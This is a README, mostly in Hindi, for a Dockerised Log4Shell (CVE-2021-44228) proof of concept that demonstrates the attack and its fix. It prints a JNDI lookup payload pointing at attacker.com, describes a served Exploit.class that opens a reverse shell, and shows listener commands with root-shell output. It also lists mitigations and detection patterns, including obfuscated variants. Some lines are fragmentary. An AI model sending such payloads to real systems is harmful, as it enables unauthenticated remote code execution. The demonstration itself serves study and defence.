
Log4Shell (CVE-2021-44228) PoC
डॉकरीकृत वातावरण में एक ज्ञात गंभीर CVE को पुनरुत्पादित, शोषण और सुधार करना।
यह PoC एक Spring Boot एप्लिकेशन में CVE-2021-44228 (Log4Shell) का प्रदर्शन करता है।
CVE: 2021-44228
CVSS: 10.0 (गंभीर)
प्रभावित घटक: Apache Log4j (<= 2.14.1)
${...}) का समर्थन करता है।${jndi:ldap://attacker.com:1389/a} जैसे दुर्भावनापूर्ण JNDI लुकअप स्ट्रिंग से दूषित करता है।Exploit.class के संदर्भ के साथ प्रतिक्रिया करता है।Exploit.class प्राप्त करता है।Exploit में स्टैटिक इनिशियलाइज़र चलता है, जो हमलावर को एक रिवर्स शेल वापस भेजता है।प्रभाव: अप्रमाणित RCE - उच्चतम संभव गंभीरता।
कौन/क्या जोखिम में है:
परिणाम:
make build start
nc -l 4444
make exploit
/bin/sh: can't access tty; job control turned off
$ id
uid=0(root) gid=0(root) groups=0(root) ...
make patch
make build start
nc -l 4444
make exploit
# -> observe no reverse shell
${jndi: पैटर्न) को प्रतिबंधित करें।-Dlog4j2.formatMsgNoLookups=true
-Dcom.sun.jndi.ldap.object.trustURLCodebase=false
gradle dependencies, Snyk, Wiz, आदि)।log4j-core-*.jar खोजें, जिसमें फैट JAR शामिल हैं।${jndi:...}, ${${lower:j}ndi:...}, आदि) पर ध्यान दें।